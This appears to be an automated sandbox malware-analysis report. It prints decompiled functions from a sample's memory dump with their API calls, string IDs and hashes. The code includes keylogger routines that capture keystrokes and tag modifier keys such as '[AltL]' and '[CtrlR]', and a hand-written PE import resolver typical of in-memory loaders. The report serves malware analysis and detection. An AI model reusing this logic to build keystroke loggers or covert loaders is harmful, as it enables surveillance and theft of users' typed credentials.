                                                                                                • Instruction Fuzzy Hash: 0301DD31A04700ABD7217B69CC0B7BE7BB55B42315F40046FE541226D3EBB95855C7DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 49%
                                                                                                			E00409B46(void* __ebx, void* __ecx) {
                                                                                                				void* _t4;
                                                                                                				void* _t7;
                                                                                                				void* _t10;
                                                                                                				signed int _t12;
                                                                                                				void* _t13;
                                                                                                				void* _t17;
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t10 = __ebx;
                                                                                                				_t17 = __ecx;
                                                                                                				_t12 = GetKeyState(0x11) & 0x0000ffff;
                                                                                                				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
                                                                                                				if(_t4 == 0) {
                                                                                                					_t13 = _t18 - 0x18;
                                                                                                					_push("[AltL]");
                                                                                                					L6:
                                                                                                					E00402076(_t10, _t13);
                                                                                                					return E00408B8F(_t17);
                                                                                                				}
                                                                                                				_t7 = _t4 - 1;
                                                                                                				if(_t7 == 0) {
                                                                                                					if(_t12 == 0) {
                                                                                                						_t13 = _t18 - 0x18;
                                                                                                						_push("[AltR]");
                                                                                                						goto L6;
                                                                                                					}
                                                                                                					return _t7;
                                                                                                				} else {
                                                                                                					E004089F0(_t17, _t18 - 0x18);
                                                                                                					return E00408BB6(_t17);
                                                                                                				}
                                                                                                			}











                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 00409B4B
                                                                                                  • Part of subcall function 004089F0: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00408A24
                                                                                                  • Part of subcall function 004089F0: GetWindowThreadProcessId.USER32(00000000,?), ref: 00408A2F
                                                                                                  • Part of subcall function 004089F0: GetKeyboardLayout.USER32(00000000), ref: 00408A36
                                                                                                  • Part of subcall function 004089F0: GetKeyState.USER32(00000010), ref: 00408A40
                                                                                                  • Part of subcall function 004089F0: GetKeyboardState.USER32(?), ref: 00408A4D
                                                                                                  • Part of subcall function 004089F0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A69
                                                                                                  • Part of subcall function 00408BB6: SetEvent.KERNEL32(?,?,?,?,00409D31,?,?,?,?,?,00000000), ref: 00408BE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 3195419117-2658077756
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 43%
                                                                                                			E00409BA0(void* __ebx, void* __ecx) {
                                                                                                				void* _t4;
                                                                                                				void* _t7;
                                                                                                				signed int _t9;
                                                                                                				void* _t10;
                                                                                                				void* _t12;
                                                                                                				void* _t13;
                                                                                                
                                                                                                				_t7 = __ebx;
                                                                                                				_t12 = __ecx;
                                                                                                				_t9 = GetKeyState(0x12) & 0x0000ffff;
                                                                                                				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
                                                                                                				if(_t4 == 0) {
                                                                                                					if(_t9 == 0) {
                                                                                                						_t10 = _t13 - 0x18;
                                                                                                						_push("[CtrlL]");
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t4 = _t4 - 1;
                                                                                                					if(_t4 == 0) {
                                                                                                						_t10 = _t13 - 0x18;
                                                                                                						_push("[CtrlR]");
                                                                                                						L5:
                                                                                                						E00402076(_t7, _t10);
                                                                                                						return E00408B8F(_t12);
                                                                                                					}
                                                                                                				}
                                                                                                				return _t4;
                                                                                                			}










                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 00409BA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004487DA() {
                                                                                                
                                                                                                				 *0x46da3c = GetCommandLineA();
                                                                                                				 *0x46da40 = GetCommandLineW();
                                                                                                				return 1;
                                                                                                			}




                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CommandLine
                                                                                                • String ID: 4e
                                                                                                • API String ID: 3253501508-1107229138
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00438FE6(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                                                                                                				char* _v8;
                                                                                                				int _v12;
                                                                                                				char _v16;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				void* __ebx;
                                                                                                				char _t34;
                                                                                                				int _t35;
                                                                                                				int _t38;
                                                                                                				long _t39;
                                                                                                				char* _t42;
                                                                                                				int _t44;
                                                                                                				int _t47;
                                                                                                				int _t53;
                                                                                                				intOrPtr _t55;
                                                                                                				void* _t56;
                                                                                                				char* _t57;
                                                                                                				char* _t62;
                                                                                                				char* _t63;
                                                                                                				void* _t64;
                                                                                                				int _t65;
                                                                                                				short* _t67;
                                                                                                				short* _t68;
                                                                                                				int _t69;
                                                                                                				intOrPtr* _t70;
                                                                                                
                                                                                                				_t64 = __edx;
                                                                                                				_t53 = _a12;
                                                                                                				_t67 = _a4;
                                                                                                				_t68 = 0;
                                                                                                				if(_t67 == 0) {
                                                                                                					L3:
                                                                                                					if(_a8 != _t68) {
                                                                                                						E00436267(_t53,  &_v28, _t64, _a16);
                                                                                                						_t34 = _v24;
                                                                                                						__eflags = _t67;
                                                                                                						if(_t67 == 0) {
                                                                                                							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                                                							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                                                								_t69 = _t68 | 0xffffffff;
                                                                                                								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                                                                                                								__eflags = _t35;
                                                                                                								if(_t35 != 0) {
                                                                                                									L29:
                                                                                                									_t28 = _t35 - 1; // -1
                                                                                                									_t69 = _t28;
                                                                                                									L30:
                                                                                                									__eflags = _v16;
                                                                                                									if(_v16 != 0) {
                                                                                                										_t55 = _v28;
                                                                                                										_t31 = _t55 + 0x350;
                                                                                                										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                                                                                                										__eflags =  *_t31;
                                                                                                									}
                                                                                                									return _t69;
                                                                                                								}
                                                                                                								 *((intOrPtr*)(E00438932())) = 0x2a;
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							_t70 = _a8;
                                                                                                							_t56 = _t70 + 1;
                                                                                                							do {
                                                                                                								_t38 =  *_t70;
                                                                                                								_t70 = _t70 + 1;
                                                                                                								__eflags = _t38;
                                                                                                							} while (_t38 != 0);
                                                                                                							_t69 = _t70 - _t56;
                                                                                                							goto L30;
                                                                                                						}
                                                                                                						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                                                                                                						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                                                                                                							_t69 = _t68 | 0xffffffff;
                                                                                                							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                                                                                                							__eflags = _t35;
                                                                                                							if(_t35 != 0) {
                                                                                                								goto L29;
                                                                                                							}
                                                                                                							_t39 = GetLastError();
                                                                                                							__eflags = _t39 - 0x7a;
                                                                                                							if(_t39 != 0x7a) {
                                                                                                								L21:
                                                                                                								 *((intOrPtr*)(E00438932())) = 0x2a;
                                                                                                								 *_t67 = 0;
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							_t42 = _a8;
                                                                                                							_t57 = _t42;
                                                                                                							_v8 = _t57;
                                                                                                							_t65 = _t53;
                                                                                                							__eflags = _t53;
                                                                                                							if(_t53 == 0) {
                                                                                                								L20:
                                                                                                								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                                                                                                								__eflags = _t44;
                                                                                                								if(_t44 != 0) {
                                                                                                									_t69 = _t44;
                                                                                                									goto L30;
                                                                                                								}
                                                                                                								goto L21;
                                                                                                							} else {
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							while(1) {
                                                                                                								L15:
                                                                                                								_t45 =  *_t57;
                                                                                                								_v12 = _t65 - 1;
                                                                                                								__eflags =  *_t57;
                                                                                                								if(__eflags == 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t47 = E004447AF(__eflags, _t45 & 0x000000ff,  &_v24);
                                                                                                								_t62 = _v8;
                                                                                                								__eflags = _t47;
                                                                                                								if(_t47 == 0) {
                                                                                                									L18:
                                                                                                									_t65 = _v12;
                                                                                                									_t57 = _t62 + 1;
                                                                                                									_v8 = _t57;
                                                                                                									__eflags = _t65;
                                                                                                									if(_t65 != 0) {
                                                                                                										continue;
                                                                                                									}
                                                                                                									break;
                                                                                                								}
                                                                                                								_t62 = _t62 + 1;
                                                                                                								__eflags =  *_t62;
                                                                                                								if( *_t62 == 0) {
                                                                                                									goto L21;
                                                                                                								}
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							_t42 = _a8;
                                                                                                							goto L20;
                                                                                                						}
                                                                                                						__eflags = _t53;
                                                                                                						if(_t53 == 0) {
                                                                                                							goto L30;
                                                                                                						}
                                                                                                						_t63 = _a8;
                                                                                                						while(1) {
                                                                                                							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                                                                                                							__eflags =  *(_t68 + _t63);
                                                                                                							if( *(_t68 + _t63) == 0) {
                                                                                                								goto L30;
                                                                                                							}
                                                                                                							_t68 =  &(_t68[0]);
                                                                                                							_t67 =  &(_t67[1]);
                                                                                                							__eflags = _t68 - _t53;
                                                                                                							if(_t68 < _t53) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L30;
                                                                                                						}
                                                                                                						goto L30;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                					return E00437709() | 0xffffffff;
                                                                                                				}
                                                                                                				if(_t53 != 0) {
                                                                                                					 *_t67 = 0;
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D2B), ref: 0043907C
                                                                                                • GetLastError.KERNEL32 ref: 0043908A
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004390E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: a8bb4b01031e5f259de07ad3e6efb6cfef612cd7c300ce03ef639e7485b1cfd3
                                                                                                • Instruction ID: 1a583c31ae247064c8e7ff38b9a128acea67bcf15ac989784a14c8bd4f3582ba
                                                                                                • Opcode Fuzzy Hash: a8bb4b01031e5f259de07ad3e6efb6cfef612cd7c300ce03ef639e7485b1cfd3
                                                                                                • Instruction Fuzzy Hash: CF415730600247AFEF259F65C848BBB7BB4EF09354F24516AF8586B3A1DBB48C01CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 55%
                                                                                                			E0040F53C(intOrPtr* __ecx) {
                                                                                                				intOrPtr _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr* _v16;
                                                                                                				signed short* _v20;
                                                                                                				intOrPtr _t41;
                                                                                                				intOrPtr _t44;
                                                                                                				intOrPtr _t46;
                                                                                                				signed short _t57;
                                                                                                				signed int _t58;
                                                                                                				intOrPtr _t59;
                                                                                                				intOrPtr* _t60;
                                                                                                				void* _t64;
                                                                                                				void* _t66;
                                                                                                				intOrPtr _t68;
                                                                                                				intOrPtr _t76;
                                                                                                				intOrPtr* _t79;
                                                                                                				intOrPtr _t80;
                                                                                                				void _t81;
                                                                                                				signed short* _t82;
                                                                                                				void* _t87;
                                                                                                				intOrPtr* _t88;
                                                                                                				void* _t89;
                                                                                                
                                                                                                				_t88 = __ecx;
                                                                                                				_t87 = 1;
                                                                                                				_t41 =  *__ecx;
                                                                                                				_t68 =  *((intOrPtr*)(__ecx + 4));
                                                                                                				_v12 = _t68;
                                                                                                				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
                                                                                                					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
                                                                                                					if(IsBadReadPtr(_t64, 0x14) == 0) {
                                                                                                						_t66 = _t64 + 0x10;
                                                                                                						while(1) {
                                                                                                							_t44 =  *((intOrPtr*)(_t66 - 4));
                                                                                                							if(_t44 == 0) {
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
                                                                                                							_v8 = _t46;
                                                                                                							if(_t46 == 0) {
                                                                                                								_push(0x7e);
                                                                                                								goto L22;
                                                                                                							} else {
                                                                                                								_push(4 +  *(_t88 + 0xc) * 4);
                                                                                                								_push( *((intOrPtr*)(_t88 + 8)));
                                                                                                								_t80 = E00439262();
                                                                                                								if(_t80 == 0) {
                                                                                                									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
                                                                                                									_push(0xe);
                                                                                                									L22:
                                                                                                									SetLastError();
                                                                                                									_t87 = 0;
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(_t88 + 8)) = _t80;
                                                                                                									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
                                                                                                									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
                                                                                                									_t81 =  *(_t66 - 0x10);
                                                                                                									if(_t81 == 0) {
                                                                                                										_t81 =  *_t66;
                                                                                                									}
                                                                                                									_t82 = _t81 + _v12;
                                                                                                									_t76 = _v8;
                                                                                                									_v16 =  *_t66 + _v12;
                                                                                                									_v20 = _t82;
                                                                                                									if( *_t82 != 0) {
                                                                                                										while(1) {
                                                                                                											_t57 =  *_t82;
                                                                                                											_push( *((intOrPtr*)(_t88 + 0x34)));
                                                                                                											if(_t57 >= 0) {
                                                                                                												_t58 = _t57 + _v12 + 2;
                                                                                                											} else {
                                                                                                												_t58 = _t57 & 0x0000ffff;
                                                                                                											}
                                                                                                											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
                                                                                                											_t79 = _v16;
                                                                                                											_t89 = _t89 + 0xc;
                                                                                                											 *_t79 = _t59;
                                                                                                											_t60 = _t79;
                                                                                                											_t76 = _v8;
                                                                                                											if( *_t60 == 0) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t82 =  &(_v20[2]);
                                                                                                											_v16 = _t60 + 4;
                                                                                                											_v20 = _t82;
                                                                                                											if( *_t82 != 0) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                											}
                                                                                                											goto L16;
                                                                                                										}
                                                                                                										_t87 = 0;
                                                                                                									}
                                                                                                									L16:
                                                                                                									if(_t87 == 0) {
                                                                                                										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
                                                                                                										SetLastError(0x7f);
                                                                                                									} else {
                                                                                                										_t66 = _t66 + 0x14;
                                                                                                										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							goto L23;
                                                                                                						}
                                                                                                					}
                                                                                                					L23:
                                                                                                				}
                                                                                                				return _t87;
                                                                                                			}


























                                                                                                APIs
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F8D9), ref: 0040F56A
                                                                                                • IsBadReadPtr.KERNEL32(?,00000014,?,0040F8D9), ref: 0040F63C
                                                                                                • SetLastError.KERNEL32(0000007F), ref: 0040F657
                                                                                                • SetLastError.KERNEL32(0000007E,?,0040F8D9), ref: 0040F670
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastRead
                                                                                                • String ID:
                                                                                                • API String ID: 4100373531-0
                                                                                                • Opcode ID: bfbdaaeeb6a855a7043da24cc3e5306f65c0aa879380a81c03b067bf07681529
                                                                                                • Instruction ID: bc598a56cc7cbea7587c2d725246a16d78325328a1b5ca59c07d35cb362a55ce
                                                                                                • Opcode Fuzzy Hash: bfbdaaeeb6a855a7043da24cc3e5306f65c0aa879380a81c03b067bf07681529
                                                                                                • Instruction Fuzzy Hash: 8041A971A00200EFEB248F69D844B6AB7B5FF84301F20887AE406A7A91D736E905CB18
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%